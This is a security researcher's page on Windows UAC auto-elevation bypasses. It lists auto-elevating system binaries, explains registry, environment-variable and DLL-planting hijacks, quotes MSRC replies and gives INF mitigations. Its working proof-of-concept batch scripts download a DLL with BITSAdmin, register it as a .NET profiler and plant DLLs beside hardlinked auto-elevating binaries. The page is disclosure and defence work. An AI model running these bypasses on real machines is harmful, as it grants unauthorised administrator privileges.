Valid HTML 4.01 Transitional Valid CSS Valid SVG 1.0

Me, myself & IT

Mitigate some Exploits for Windows’ UAC

Purpose
Background Information
Reason
Details
Auto-elevating Applications
Vulnerabilities
Vulnerabilities of CompMgmtLauncher.exe
Vulnerability of EventVwr.exe
Vulnerability of MMC.exe
Vulnerability of MMC.exe
Vulnerability of Shortcuts in the Start Menu
Blended Vulnerabilities
Blended Vulnerabilities (Continued)
Blended Vulnerabilities (Finished)
Compound Vulnerabilities
MSRC Case 39303
MSRC Case 64957
Mitigations
Mitigation against Exploitation of CompMgmtLauncher.exe
Mitigation against Exploitation of EventVwr.exe
Mitigations against Exploitation of .NET Framework Profiler
Mitigations against Exploitation of HTML Help
Mitigations against Exploitation of Vulnerable Shortcuts in the Start Menu
Mitigation against Exploitation of WUSA.exe
Mitigation against Exploitation of MSHTA.exe, CScript.exe and WScript.exe
Mitigations against Exploitation of Compound Vulnerabilities
Alternative Mitigation
Installation
Update
Deinstallation
Trivia

Purpose

Mitigate some exploits for vulnerabilities introduced with Windows 7 by the auto-elevation (mis)feature of the braindead security theatre known as User Account Control:

Note: qUACkery is another adequate name for this abomination!

Reason

As shipped by Microsoft®, all versions of Windows NT are unsafe: Windows is still setup without strict privilege separation, i.e. without separate accounts for (unprivileged) user(s) and (privileged) administrator(s)!

The TechNet article What's New in User Account Control states for example:

Because UAC requires an administrator to approve application installations, unauthorized applications cannot be installed automatically or without the explicit consent of an administrator.
This statement is but wrong: due to the changes introduced with Windows 7, unauthorised applications can be executed (and installed) automatically, without the explicit consent of an administrator!

Also see Mark Russinovich’s TechNet magazine articles Inside Windows Vista User Account Control and Inside Windows 7 User Account Control.

Background Information

User Account Protection was the preliminary name for a core security component of Windows Vista. The component has now been officially named User Account Control (UAC).
[Screen shot of default 'User Account Control Settings' from Windows 7] Windows Vista® introduced the security feature (really: security theatre) User Account Control: programs which need or want to be run with administrative privileges and access rights have to ask the user for consent.

This made some (really: a minority of) users quite angry: although these (rather braindead) users continued to abuse the (privileged) protected administrator account created during Windows Setup for their daily work (instead to follow best practise and use an unprivileged limited alias standard user account), they had to answer a prompt whenever they wanted to perform an administrative task.
Unfortunately Microsoft heard these users and weakened the security feature: Windows 7 introduced auto-elevation and enabled it for some 55 programs shipped with Windows 7 and later versions, which don’t prompt for consent any more.

Due to flaws in the design and deficiencies in the implementation of User Account Control, it can be bypassed trivially in numerous ways with its auto-elevation (mis)feature enabled. As result, arbitrary programs can then be run with administrative privileges and access rights without prompting the user for consent.
To defeat some of these trivial bypasses, auto-elevation must be disabled by moving the slider of the User Account Control setting to its highest position titled Always notify, as documented and shown in the MSKB articles 975787 and 4462938.

Details

UAC auto-elevation is enabled for applications which As documented and shown in the MSKB articles 975787 and 4462938, auto-elevation is performed for enabled applications unless the slider is set to its highest position titled Always notify; its default setting is but Notify me only when programs try to make changes to my computer.

Auto-elevating Applications

Windows 7 SP1, x64 alias AMD64 Processor Architecture

 64-bit   32-bit 
AdapterTroubleshooter.exe
BitLockerWizardElev.exe
bthudtask.exe
chkntfs.exe
cleanmgr.exe
cliconfg.exe
CompMgmtLauncher.exe
ComputerDefaults.exe
dccw.exe
dcomcnfg.exe
DeviceEject.exe
DeviceProperties.exe
dfrgui.exe
djoin.exe
eudcedit.exe
eventvwr.exe
fsquirt.exe
FXSUNATD.exe
hdwwiz.exe
ieUnatt.exe
iscsicli.exe
iscsicpl.exe
lpksetup.exe
Mcx2Prov.exe
MdSched.exe
msconfig.exe
msdt.exe
msra.exe
MultiDigiMon.exe
Netplwiz.exe
newdev.exe
ntprint.exe
ocsetup.exe
odbcad32.exe
OptionalFeatures.exe
PDMSetup.exe
perfmon.exe
printui.exe
rdpshell.exe
recdisc.exe
rrinstaller.exe
rstrui.exe
sdbinst.exe
sdclt.exe
setupsqm.exe
shrpubw.exe
slui.exe
SndVol.exe
sysprep.exe
SystemPropertiesAdvanced.exe
SystemPropertiesComputerName.exe
SystemPropertiesDataExecutionPrevention.exe
SystemPropertiesHardware.exe
SystemPropertiesPerformance.exe
SystemPropertiesProtection.exe
SystemPropertiesRemote.exe
taskmgr.exe
tcmsetup.exe
TpmInit.exe
verifier.exe
WindowsAnytimeUpgrade.exe
wisptis.exe
wusa.exe

Windows 10 2004 and Windows 10 20H2, x64 alias AMD64 Processor Architecture

 64-bit   32-bit 
BitLockerWizardElev.exe
bthudtask.exe
changepk.exe
cleanmgr.exe
ComputerDefaults.exe
dccw.exe
dcomcnfg.exe
DeviceEject.exe
DeviceProperties.exe
dfrgui.exe
djoin.exe
easinvoker.exe
EASPolicyManagerBrokerHost.exe
eudcedit.exe
eventvwr.exe
fodhelper.exe
fsavailux.exe
fsquirt.exe
FXSUNATD.exe
immersivetpmvscmgrsvr.exe
iscsicli.exe
iscsicpl.exe
lpksetup.exe
MdSched.exe
MSchedExe.exe
msconfig.exe
msdt.exe
msra.exe
MultiDigiMon.exe
Netplwiz.exe
newdev.exe
odbcad32.exe
OptionalFeatures.exe
PasswordOnWakeSettingFlyout.exe
perfmon.exe
printui.exe
rdpshell.exe
recdisc.exe
rrinstaller.exe
rstrui.exe
sdclt.exe
shrpubw.exe
slui.exe
SndVol.exe
SystemPropertiesAdvanced.exe
SystemPropertiesComputerName.exe
SystemPropertiesDataExecutionPrevention.exe
SystemPropertiesHardware.exe
SystemPropertiesPerformance.exe
SystemPropertiesProtection.exe
SystemPropertiesRemote.exe
systemreset.exe
SystemSettingsAdminFlows.exe
SystemSettingsRemoveDevice.exe
Taskmgr.exe
tcmsetup.exe
TpmInit.exe
WindowsUpdateElevatedInstaller.exe
WSReset.exe
wusa.exe

Vulnerabilities

The following vulnerabilities can be exploited in standard installations of Windows 7 and newer versions of Windows NT, without user interaction!

Note: only vulnerabilities and exploits for which a mitigation exists are presented here, together with their mitigation!

Vulnerabilities of CompMgmtLauncher.exe

The superfluous application Computer Management Snapin Launcher CompMgmtLauncher.exe is used to start the Computer Management snap-in CompMgmt.msc of the Microsoft Management Console; it is one of the about 63 applications shipped with Windows 7 and newer versions of Windows NT which have auto-elevation enabled.

Note: it is superfluous because the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\CompMgmt.msc" launches Computer Management directly, and MMC.exe has auto-elevation enabled too.

CompMgmtLauncher.exe has a major design flaw: instead of launching the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\CompMgmt.msc" it launches the shortcut %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk alias %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk.

An unprivileged user can set the environment variable ALLUSERSPROFILE to the pathname of an arbitrary directory under his control, create the subdirectory Microsoft\Windows\Start Menu\Programs\Administrative Tools\ there and then create the shortcut Computer Management.lnk specifying an arbitrary (rogue) command line in this subdirectory.
In standard installations of Windows 7 and newer versions of Windows NT, CompMgmtLauncher.exe launches this command line without UAC prompt with administrative privileges and access rights.

Note: because the command line %SystemRoot%\System32\CompMgmt.msc of the shortcut %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk specifies no executable file, CompMgmtLauncher.exe exhibits the (following) vulnerability of EventVwr.exe too.

Vulnerability of EventVwr.exe

The superfluous application Event Viewer Snapin Launcher EventVwr.exe is used to start the Event Viewer snap-in EventVwr.msc of the MMC.exe; it is one of the about 63 applications shipped with Windows 7 and newer versions of Windows NT which have auto-elevation enabled.

Note: it is superfluous because the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\EventVwr.msc" launches Event Viewer directly, and MMC.exe has auto-elevation enabled too.

Note: EventVwr.exe exists for backward compatibility with Windows NT4 and earlier versions of Windows NT only; in Windows 2000 the standalone Event Viewer application was replaced by the snap-in EventVwr.msc.

EventVwr.exe has a major design flaw: instead of launching the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\EventVwr.msc" it calls the Win32 function ShellExecute() to launch EventVwr.msc; to evaluate the command line to execute, ShellExecute() reads the (unnamed) default values of the Registry keys HKEY_CLASSES_ROOT\.msc and HKEY_CLASSES_ROOT\mscfile\Shell\Open\Command.

The (virtual) Registry branch HKEY_CLASSES_ROOT is the overlay of the Registry branch HKEY_LOCAL_MACHINE\SOFTWARE\Classes with the Registry branch HKEY_CURRENT_USER\Software\Classes, i.e. the latter takes precedence.

An unprivileged user can create the Registry key HKEY_CURRENT_USER\Software\Classes\mscfile\Shell\Open\Command and write an arbitrary (rogue) command line to its (unnamed) default value, or create the Registry key HKEY_CURRENT_USER\Software\Classes\.msc and write an arbitrary (rogue) Programmatic Identifier (uacamole for example) to its (unnamed) default value, then create the Registry key HKEY_CURRENT_USER\Software\Classes\uacamole\Shell\Open\Command and write an arbitrary (rogue) command line to its (unnamed) default value.

In standard installations of Windows 7 and newer versions of Windows NT, EventVwr.exe launches this command line without UAC prompt with administrative privileges and access rights.

Vulnerability of MMC.exe

Multiple snap-ins of the Microsoft Management Console are implemented using the .NET Framework.

When .NET Framework is loaded, its Common Language Runtime execution engine evaluates the environment variables COR_ENABLE_PROFILING and COR_PROFILER, since .NET Framework 4 additionally COR_PROFILER_PATH, and loads the COM object specified by them as Code Profiler:

When both environment variable checks pass, the CLR creates an instance of the profiler in a similar manner to the COM CoCreateInstance function. The profiler is not loaded through a direct call to CoCreateInstance. Therefore, a call to CoInitialize, which requires setting the threading model, is avoided.
The CLR execution engine but fails to implement the security checks added to the Win32 function CoCreateInstance() in Windows Vista®:
The Component Object Model (COM) leverages the registry to maintain information about all of the COM objects installed on a computer. This registry hive (HKEY_CLASSES_ROOT) is a virtual registry hive, which allows for both per-user and per-machine object registration. Per-user COM objects configurations are stored in HKEY_CURRENT_USER\Software\Classes, while per-machine configurations are stored in HKEY_LOCAL_MACHINE\Software\Classes. Typically, per-user configurations take precedence.

Beginning with Windows Vista® and Windows Server® 2008, if the integrity level of a process is higher than Medium, the COM runtime ignores per-user COM configuration and accesses only per-machine COM configuration. This action reduces the surface area for elevation of privilege attacks, preventing a process with standard user privileges from configuring a COM object with arbitrary code and having this code called from an elevated process.

An unprivileged user can set the environment variables and create the Registry keys and entries below HKEY_CURRENT_USER\Software\Classes\CLSID to register an arbitrary (rogue) DLL as COM object.

In standard installations of Windows 7 and newer versions of Windows NT, MMC.exe loads this DLL without UAC prompt with administrative privileges and access rights.

Note: this vulnerability allows arbitrary code execution in every application which uses .NET Framework!

Start the Command Processor under the user protected administrator account created during Windows Setup and run the following (block of) command lines: 

REM Copyright © 2017-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Exploit /DOWNLOAD /PRIORITY FOREGROUND https://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:*.DLL "%TMP%"
SET COR_ENABLE_PROFILING=1
SET COR_PROFILER={32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
REM SET COR_PROFILER_PATH=%TMP%\%PROCESSOR_ARCHITECTURE%\SENTINEL.DLL
IF NOT "%PROCESSOR_ARCHITECTURE%" == "x86" (
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /VE /T REG_SZ /D "%TMP%\%PROCESSOR_ARCHITECTURE%\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /REG:32 /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /REG:32 /V ThreadingModel /T REG_SZ /D Apartment /F
) ELSE (
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
)
START EventVwr.msc

Vulnerability of MMC.exe

The help function of the Microsoft Management Console is implemented with HTML Help: when the F1 key is pressed, MMC.exe calls HHCtrl.ocx, which in turn loads an arbitrary (rogue) DLL registered by the unprivileged user with the following Registry entry: 
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\HtmlHelp Author]
"Location"="‹path›\\‹filename›.‹extension›"
In standard installations of Windows Vista and newer versions of Windows NT, ‹path›\‹filename›.‹extension› is executed with administrative privileges and access rights.

Note: this undocumented feature allows arbitrary code execution in every application which uses HTML Help!

Vulnerability of Shortcuts in the Start Menu

The shortcuts for all snap-ins of the Microsoft Management Console in the directories %ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\ and %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ show the same vulnerability as EventVwr.exe: Windows Explorer processes their command lines %SystemRoot%\System32\‹filename›.msc just like the Win32 function ShellExecute() does.

Blended Vulnerabilities

WUSA.exe, the Windows Update Standalone Installer, is yet another of the about 63 applications shipped with Windows 7 and newer versions of Windows NT which have auto-elevation enabled.
Its /Extract:‹destination› command-line switch allows to extract the contents of arbitrary cabinet archives into arbitrary destination directories. Because it runs elevated this feature can be (ab)used to plant DLLs loaded and executed by other applications which have auto-elevation enabled to gain administrative privileges and access rights:
MMC.exe

The Event Viewer snap-in EventVwr.msc of the Microsoft Management Console MMC.exe loads and executes ELS.dll, which in turn loads and executes ELSExt.dll; because ELSExt.dll is not shipped with Windows, an arbitrary (rogue) DLL with this filename can be planted in the system directory %SystemRoot%\System32\, from where it is then loaded and executed with administrative privileges and access rights.

CliConfg.exe

The SQL Client Configuration Utility CliConfg.exe has auto-elevation enabled too.
It loads and executes NTWDBLib.dll; because NTWDBLib.dll is not shipped with Windows, an arbitrary (rogue) DLL with this filename can be planted in the system directory %SystemRoot%\System32\, from where it is then loaded and executed with administrative privileges and access rights.

SysPrep.exe

The System Preparation Utility SysPrep.exe has auto-elevation enabled too.
In Windows 7 and Windows Server 2008 R2, it loads and executes CryptBase.dll, CryptSP.dll, DWMAPI.dll, RPCRtRemote.dll and UXTheme.dll; because these DLLs don’t exist in its application directory %SystemRoot%\System32\SysPrep\, arbitrary (rogue) DLLs with these filenames can be planted there, from where they are then loaded and executed with administrative privileges and access rights.

SetupSQM.exe

The Setup SQM Tool SetupSQM.exe has auto-elevation enabled too.
It loads and executes WDSCore.dll; because WDSCore.dll does not exist in its application directory %SystemRoot%\System32\OoBE\, an arbitrary (rogue) DLL with this filename can be planted there, from where it is then loaded and executed with administrative privileges and access rights.

MCX2Prov.exe

The MCX2 Provisioning Library MCX2Prov.exe has auto-elevation enabled too.
In Windows 7 it loads and executes CryptBase.dll; because CryptBase.dll does not exist in its application directory %SystemRoot%\eHome\, an arbitrary (rogue) DLL with this filename can be planted there, from where it is then loaded and executed with administrative privileges and access rights.

PkgMgr.exe

The Windows Package Manager PkgMgr.exe has auto-elevation enabled too.
It calls DISMHost.exe to perform some of its tasks, which loads and executes PEProvider.dll; because PEProvider.dll is not shipped with Windows, an arbitrary (rogue) DLL with this filename can be planted in its application directory %SystemRoot%\System32\DISM\, from where it is then loaded and executed with administrative privileges and access rights.

MSHTA.exe, CScript.exe and WScript.exe

In Windows 7 and Windows Server 2008 R2, the applications Microsoft HTML Application Host MSHTA.exe, Console Based Script Host CScript.exe and Windows Based Script Host WScript.exe are shipped without embedded Application Manifest.
Windows’ module loader therefore evaluates external (rogue) application manifests MSHTA.exe.manifest, CScript.exe.manifest and WScript.exe.manifest planted in the system directory %SystemRoot%\System32\. These application manifests can enable auto-elevation, resulting in execution of every HTML Application *.hta, every JScript *.js or *.jse, every VBScript *.vbs or *.vbe, as well as every other script *.wsf or *.wsh for the Windows Script Host with administrative privileges and access rights.

Blended Vulnerabilities (Continued)

The Diagnostics Troubleshooting Wizard MSDT.exe performs auto-elevation. Its satellites, including various DLLs, are installed in multiple subdirectories %SystemRoot%\Diagnostics\Index\*\ and %SystemRoot%\Diagnostics\System\*\. Running elevated, MSDT.exe launches the Scripted Diagnostics Native Host SDiagNHost.exe which loads and executes these DLLs.
On 64-bit installations of Windows, most of them are built for the 64-bit execution environment, and some of them are built for the 32-bit execution environment, i.e. the DLLs for one of the execution environments are but missing!

When searching the PATH for a DLL, Windows’ module loader skips DLLs built for execution environments other than that of the running process. An unprivileged user can build the missing DLLs and place them in an arbitrary directory of the search path, for example the directory %LOCALAPPDATA%\Microsoft\WindowsApps\ alias %USERPROFILE%\AppData\Local\Microsoft\WindowsApps\ introduced with Windows 8.

Note: the (tail of the) search path is controlled by the unprivileged user who can append arbitrary directory names to the user environment variable PATH!

In standard installations of Windows 7 and newer versions of Windows NT, MSDT.exe loads and executes these DLLs indirect via SDiagNHost.exe without UAC prompt with administrative privileges and access rights.

Note: this bypass was also found independent and published as MSDT DLL Hijack UAC bypass.

Blended Vulnerabilities (Finished)

Since Windows 8, the Microsoft® Windows Backup command line tool SDCLT.exe performs auto-elevation. Running elevated it launches the Windows Control Panel Control.exe, which calls ShellExecute() to open a folder.

ShellExecute() reads the (unnamed) default value of the Registry key HKEY_CLASSES_ROOT\Folder\Shell\Open\Command and executes the command line found there.

The (virtual) Registry branch HKEY_CLASSES_ROOT is the overlay of the Registry branches HKEY_LOCAL_MACHINE\SOFTWARE\Classes and HKEY_CURRENT_USER\Software\Classes, i.e. the latter takes precedence.

An unprivileged user can create the Registry key HKEY_CURRENT_USER\Software\Classes\Folder\Shell\Open\Command and write an arbitrary (rogue) command line to its (unnamed) default value.

In standard installations of Windows 8 and newer versions of Windows NT, SDCLT.exe launches this command line indirect via Control.exe without UAC prompt with administrative privileges and access rights.

Note: this bypass was also found independent and published as Yet another sdclt UAC bypass.

Compound Vulnerabilities

Since more than 23 (in words: twenty-three) years, Microsoft’s developers as well as their quality miserability assurance ignore their own companies security guidance, given for example in the MSDN articles Dynamic-Link Library Security and Dynamic-Link Library Search Order, the Security Advisory 2269637, the MSKB articles 2389418 and 2533623, the MSRC post Load Library Safely, plus many more documents.

Due to this gross incompetence and negligence, almost all applications shipped with Windows are vulnerable to the well-known and well-documented CWE-426: Untrusted Search Path as well as CWE-427: Uncontrolled Search Path Element, and susceptible to the well-known and well-documented CAPEC-471: Search Order Hijacking.

Several directories below %SystemRoot%\, for example %SystemRoot%\System32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ and %SystemRoot%\System32\Microsoft\Crypto\RSA\MachineKeys\, are writable by unprivileged users, who can copy one of the about 63 (vulnerable) applications which have the auto-elevation (mis)feature enabled next to any (rogue) DLLs they load into these directories and execute them there to exploit this vulnerability and run arbitrary code provided in the DLLs with administrative privileges and access rights!

Start the Command Processor with delayed variable expansion enabled under the user protected administrator account created during Windows Setup and run the following (blocks of) command lines: 

REM Copyright © 2011-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

TITLE Step 1: NetPlWiz.exe shows a (yellow) UAC prompt when run from an untrusted directory
COPY /Y "%SystemRoot%\System32\NetPlWiz.exe" "%ProgramData%\NetPlWiz.exe"
START "Oops!" /WAIT /B "%ProgramData%\NetPlWiz.exe"
"%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%

TITLE Step 2: NetPlWiz.exe loads an arbitrary NetPlWiz.dll from its application directory
COPY /Y "%SystemRoot%\System32\ShUnimpl.dll" "%ProgramData%\NetPlWiz.dll"
START "Ouch!" /WAIT /B "%ProgramData%\NetPlWiz.exe"
"%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%

TITLE Step 3: NetPlWiz.exe auto-elevates and loads an arbitrary NetPlWiz.dll
COPY /Y NUL: "%ProgramData%\NetPlWiz.log"
DIR "%SystemRoot%" /A:D /B /S 1>"%ProgramData%\NetPlWiz.tmp"
FOR /F "Delims= UseBackQ" %? IN ("%ProgramData%\NetPlWiz.tmp") DO @(
MKLINK /H "%~?\NetPlWiz.exe" "%ProgramData%\NetPlWiz.exe" 2>NUL: && (
MKLINK /H "%~?\NetPlWiz.dll" "%ProgramData%\NetPlWiz.dll"
START "BOOM?" /WAIT /B "%~?\NetPlWiz.exe"
ECHO !ERRORLEVEL! %~? 1>>"%ProgramData%\NetPlWiz.log"
ERASE "%~?\NetPlWiz.dll"
ERASE "%~?\NetPlWiz.exe"))

TITLE Step 4: display collected error levels and path names
TYPE "%ProgramData%\NetPlWiz.log"

TITLE Step 5: cleanup
ERASE "%ProgramData%\NetPlWiz.dll"
ERASE "%ProgramData%\NetPlWiz.exe"
ERASE "%ProgramData%\NetPlWiz.log"
ERASE "%ProgramData%\NetPlWiz.tmp"
        1 file(s) copied.
0x0 (WIN32: 0 ERROR_SUCCESS) -- 0 (0)
Error message text: The operation completed successfully.
CertUtil: -error command completed successfully.
        1 file(s) copied.
0xc0000139 (NT: 0xc0000139 STATUS_ENTRYPOINT_NOT_FOUND) -- 3221225785 (-1073741511)
Error message text: {Entry Point Not Found}
The procedure entry point %hs could not be located in the dynamic link library %hs.
CertUtil: -error command completed successfully.
Hardlink created for C:\Windows\Tasks\NetPlWiz.exe <<===>> C:\ProgramData\NetPlWiz.exe
Hardlink created for C:\Windows\Tasks\NetPlWiz.dll <<===>> C:\ProgramData\NetPlWiz.dll
[…]
Hardlink created for C:\Windows\Temp\NetPlWiz.exe <<===>> C:\ProgramData\NetPlWiz.exe
Hardlink created for C:\Windows\Temp\NetPlWiz.dll <<===>> C:\ProgramData\NetPlWiz.dll
Could Not Find C:\Windows\Temp\NetPlWiz.dll
Could Not Find C:\Windows\Temp\NetPlWiz.exe
[…]

REM Copyright © 2011-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

TITLE Step 1: PrintUI.exe shows a (yellow) UAC prompt when run from an untrusted directory
COPY /Y "%SystemRoot%\System32\PrintUI.exe" "%PUBLIC%\PrintUI.exe"
START "Oops!" /WAIT /B "%PUBLIC%\PrintUI.exe"
"%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%

TITLE Step 2: PrintUI.exe loads an arbitrary PrintUI.dll from its application directory
COPY /Y "%SystemRoot%\System32\ShUnimpl.dll" "%PUBLIC%\PrintUI.dll"
START "Ouch!" /WAIT /B "%PUBLIC%\PrintUI.exe"
"%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%

TITLE Step 3: PrintUI.exe auto-elevates and loads an arbitrary PrintUI.dll
COPY /Y NUL: "%PUBLIC%\PrintUI.log"
DIR "%SystemRoot%" /A:D /B /S 1>"%PUBLIC%\PrintUI.tmp"
FOR /F "Delims= UseBackQ" %? IN ("%PUBLIC%\PrintUI.tmp") DO @(
MKLINK /H "%~?\PrintUI.exe" "%PUBLIC%\PrintUI.exe" 2>NUL: && (
MKLINK /H "%~?\PrintUI.dll" "%PUBLIC%\PrintUI.dll"
START "BOOM?" /WAIT /B "%~?\PrintUI.exe"
ECHO !ERRORLEVEL! %~? 1>>"%PUBLIC%\PrintUI.log"
ERASE "%~?\PrintUI.dll"
ERASE "%~?\PrintUI.exe"))

TITLE Step 4: display collected error levels and path names
TYPE "%PUBLIC%\PrintUI.log"

TITLE Step 5: cleanup
ERASE "%PUBLIC%\PrintUI.dll"
ERASE "%PUBLIC%\PrintUI.exe"
ERASE "%PUBLIC%\PrintUI.log"
ERASE "%PUBLIC%\PrintUI.tmp"
        1 file(s) copied.
The operation completed successfully.
        1 file(s) copied.
A dynamic link library (DLL) initialization routine failed.
Hardlink created for C:\Windows\Tasks\PrintUI.exe <<===>> C:\Users\Public\PrintUI.exe
Hardlink created for C:\Windows\Tasks\PrintUI.dll <<===>> C:\Users\Public\PrintUI.dll
[…]
Hardlink created for C:\Windows\Temp\PrintUI.exe <<===>> C:\Users\Public\PrintUI.exe
Hardlink created for C:\Windows\Temp\PrintUI.dll <<===>> C:\Users\Public\PrintUI.dll
Could Not Find C:\Windows\Temp\PrintUI.dll
Could Not Find C:\Windows\Temp\PrintUI.exe
[…]

MSRC Case 39303

I reported the vulnerability introduced from the Common Language Runtime of the .NET Framework to the MSRC, where case number 39303 was assigned.

They replied with the following statement:

UAC is not a security boundary. As such, this does not meet the bar for an explicit down level fix.
OUCH: this vulnerability is in the Common Language Runtime of the .NET Framework, not in the User Account Control, which can but be bypassed due to it!

Note: User Account Control was but announced and introduced as core security component:

User Account Protection was the preliminary name for a core security component of Windows Vista. The component has now been officially named User Account Control (UAC).
What’s the worth of a core security component that can be bypassed due to careless or clueless implementation of another component?
What about defense in depth or trustworthy computing?

MSRC Case 64957

I reported the vulnerability introduced by the user-writable directories to the MSRC, where case number 64957 was assigned.

They replied with the following statement:

Thank you again for your research and report. Our analyst has completed their review of your report regarding color coded UAC prompts. We were able to reproduce the issue as you reported it, but this issue would not meet our bar for immediate servicing with a Patch Tuesday security update. Issues involving UAC typically do not meet the bar per our servicing criteria published here - https://aka.ms/windowscriteria, as we don't consider UAC a hard security boundary, but rather, a customizable enhancement to assist in making security accessible to all users from home consumers to enterprise customers.

I will be closing this case, but we have notified the UAC team, and this is something that they may consider for a future release of Windows. We appreciate the opportunity to review your research, and please don't hesitate to send us any additional findings at https://aka.ms/secure-at.

Ouch: the vulnerability is not the color code of the UAC prompt, but that auto-elevation is performed in untrusted directories, with vulnerable applications, without UAC prompt!

What’s the worth of a core security component that can simply be bypassed by granting unprivileged users write permission in directories beyond the system directory due to careless and clueless implementation of the applications that depend on it?
What about defense in depth or trustworthy computing?

Mitigations

With the mitigations presented here an unprivileged process or user can still execute CompMgmtLauncher.exe and EventVwr.exe, but they run with the unprivileged process’ or user’s credentials, not elevated; when they launch %SystemRoot%\System32\CompMgmt.msc or %SystemRoot%\System32\EventVwr.msc, elevation is handled during start of %SystemRoot%\System32\MMC.exe.

Note: the mitigations are designed for and have been tested on Windows 7; their adaption to newer versions of Windows NT is left as an exercise to the reader.

Mitigation against Exploitation of CompMgmtLauncher.exe

Replace the command line of the Computer Management context menu entry of the Computer icon which launches the superfluous CompMgmtLauncher.exe and additionally inhibit its elevation: 
; Copyright © 2016-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = Registry

[Registry]
HKCR,"CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\Shell\Manage\Command",,32,"%16421%\MMC.exe %16421%\CompMgmt.msc"
HKCR,"Launcher.Computer\Shell\Manage\Command",,32,"%16421%\MMC.exe %16421%\CompMgmt.msc"

HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\CompMgmtLauncher.exe",2,"RunAsInvoker"
Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Note: always specify complete command lines in Registry entries, not just the name of a data or script file, and always use fully qualified pathnames!

Mitigation against Exploitation of EventVwr.exe

Replace the command line of the verb Open for Event Log files which launches the superfluous EventVwr.exe and additionally inhibit its elevation: 
; Copyright © 2009-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = Registry

[Registry]
HKCR,"evtfile\Shell\Open\Command",,32,"%16421%\MMC.exe %16421%\EventVwr.msc /L:""%L"""
HKCR,"evtxfile\Shell\Open\Command",,32,"%16421%\MMC.exe %16421%\EventVwr.msc /L:""%L"""

HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\EventVwr.exe",2,"RunAsInvoker"
Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Note: always specify complete command lines in Registry entries, not just the name of a data or script file, and always use fully qualified pathnames!

Mitigations against Exploitation of .NET Framework Profiler

Use an unprivileged Standard User account!

Additionally use AppLocker or Software Restriction Policies alias SAFER. to deny execution of DLLs from user-writable directories.

Mitigations against Exploitation of HTML Help

Use an unprivileged Standard User account!

Additionally use AppLocker or Software Restriction Policies alias SAFER. to deny execution of DLLs from user-writable directories.

Mitigations against Exploitation of Vulnerable Shortcuts in the Start Menu

Replace the command line of the shortcuts: 
; Copyright © 2009-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
ProfileItems = Shortcut

[Shortcut]
CmdLine     = 16421,,"MMC.exe %16421%\TaskSchd.msc"
;HotKey     =
IconIndex   = 1
IconPath    = 16421,,"MIGUIResource.dll"
InfoTip     = "@%16421%\MIGUIResource.dll,-202"
Name        = "Task Scheduler",0
SubDir      = "Accessories\System Tools"
;WorkingDir = 16421,
Note: creation of safe shortcuts to the various other *.msc found in the directory %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ is left as an exercise to the reader.

